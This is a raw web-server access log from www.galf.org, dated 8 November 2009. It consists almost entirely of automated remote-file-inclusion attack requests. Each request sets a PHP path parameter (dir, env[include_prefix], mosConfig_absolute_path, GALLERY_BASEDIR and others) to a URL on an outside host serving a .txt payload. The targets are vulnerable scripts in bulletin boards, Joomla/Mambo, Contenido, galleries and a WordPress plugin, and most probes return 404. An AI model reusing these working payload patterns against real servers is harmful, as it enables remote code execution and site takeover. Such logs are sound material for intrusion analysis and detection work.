77.221.130.17 - - [08/Nov/2009:23:08:08 -0800] "GET /send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:08 -0800] "GET /logs//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:08 -0800] "GET /logs/access_091005.log//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:14 -0800] "GET /logs/access_090817.log//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:18 -0800] "GET /logs/access_091005.log//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:18 -0800] "GET /send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:18 -0800] "GET /logs//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:23 -0800] "GET /logs/access_090817.log//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:48 -0800] "GET /logs/access_091005.log%20%20//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:51 -0800] "GET /logs/access_090817.log%20%20//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:53 -0800] "GET /logs/access_091005.log%20%20//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:08:57 -0800] "GET /logs/access_090817.log%20%20//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:09:24 -0800] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:09:24 -0800] "GET /logs/access_090622.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:09:24 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:09:24 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:23:10:31 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:23:10:31 -0800] "GET /logs/access_091012.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:23:10:31 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:23:10:31 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:10:41 -0800] "GET /logs/access_090810.log//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [08/Nov/2009:23:11:26 -0800] "GET /logs/?D=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:41 -0800] "GET /logs/access_090511.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:41 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:41 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:41 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:41 -0800] "GET /logs/access_090511.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:41 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:42 -0800] "GET /logs/access_090511.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:42 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:11:42 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:12:06 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:12:07 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:12:07 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:23:13:10 -0800] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:19 -0800] "GET /logs/access_090511.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:19 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:19 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:20 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:20 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:20 -0800] "GET /logs/access_090511.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:24 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:24 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:24 -0800] "GET /logs/access_090511.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:37 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:40 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:23:13:45 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:23:14:02 -0800] "GET /logs/access_091005.log//skin/ggambo7002_board/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:23:14:04 -0800] "GET /logs/access_091012.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:23:14:04 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:15:00 -0800] "GET /logs/access_090316.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:15:00 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:15:00 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:15:01 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:15:01 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:15:01 -0800] "GET /logs/access_090316.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:17:09 -0800] "GET /logs/access.log//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:23:18:04 -0800] "GET /logs/access_090831.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:23:18:35 -0800] "GET /logs/access_090824.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:22:26 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:22:26 -0800] "GET /logs/access_090601.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:22:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.249.65.151 - - [08/Nov/2009:23:22:30 -0800] "GET /LABIA23/figuras3.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:22:44 -0800] "GET /logs/access_091012.log//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:22:44 -0800] "GET /logs//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:22:44 -0800] "GET /?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:23:33 -0800] "GET /logs/access_090629.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:23:41 -0800] "GET /logs/access_090406.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:24:15 -0800] "GET /logs/access_090727.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:24:44 -0800] "GET /logs/access_091012.log//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:24:45 -0800] "GET /?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:24:45 -0800] "GET /logs//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:25:12 -0800] "GET /logs/access_090511.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:25:12 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:25:12 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:25:44 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:25:44 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:25:44 -0800] "GET /logs/access_090511.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:26:01 -0800] "GET /logs/access_090824.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:26:28 -0800] "GET /logs/access_090824.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:26:58 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:26:58 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:26:58 -0800] "GET /logs/access_090316.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:27:08 -0800] "GET /logs/access_090504.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:27:26 -0800] "GET /logs/access_090622.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:27:35 -0800] "GET /logs/access_090622.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [08/Nov/2009:23:28:06 -0800] "GET /logs/access_091012.log/include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [08/Nov/2009:23:28:06 -0800] "GET /logs/include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [08/Nov/2009:23:28:06 -0800] "GET /include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [08/Nov/2009:23:28:26 -0800] "GET /logs/access.log/include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.29.90.110 - - [08/Nov/2009:23:28:26 -0800] "GET /logs/include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.29.90.110 - - [08/Nov/2009:23:28:26 -0800] "GET /include?_REQUEST[error]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.79.54.195 - - [08/Nov/2009:23:30:16 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:30:16 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:30:16 -0800] "GET /logs/access_090629.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:30:27 -0800] "GET /logs/access_090921.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:23:30:28 -0800] "GET /logs//skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:23:30:28 -0800] "GET /skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:23:30:28 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:23:30:56 -0800] "GET /logs/access_091012.log%20%20//skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:23:30:56 -0800] "GET /logs//skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:23:30:56 -0800] "GET /skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:23:31:33 -0800] "GET /logs/access.log//skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:23:31:33 -0800] "GET /logs//skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:23:31:33 -0800] "GET /skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [08/Nov/2009:23:31:38 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:31:38 -0800] "GET /logs/access_090615.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:31:38 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:31:41 -0800] "GET /logs/access_090615.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:31:41 -0800] "GET /logs/access_090615.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:31:41 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:31:41 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:31:41 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
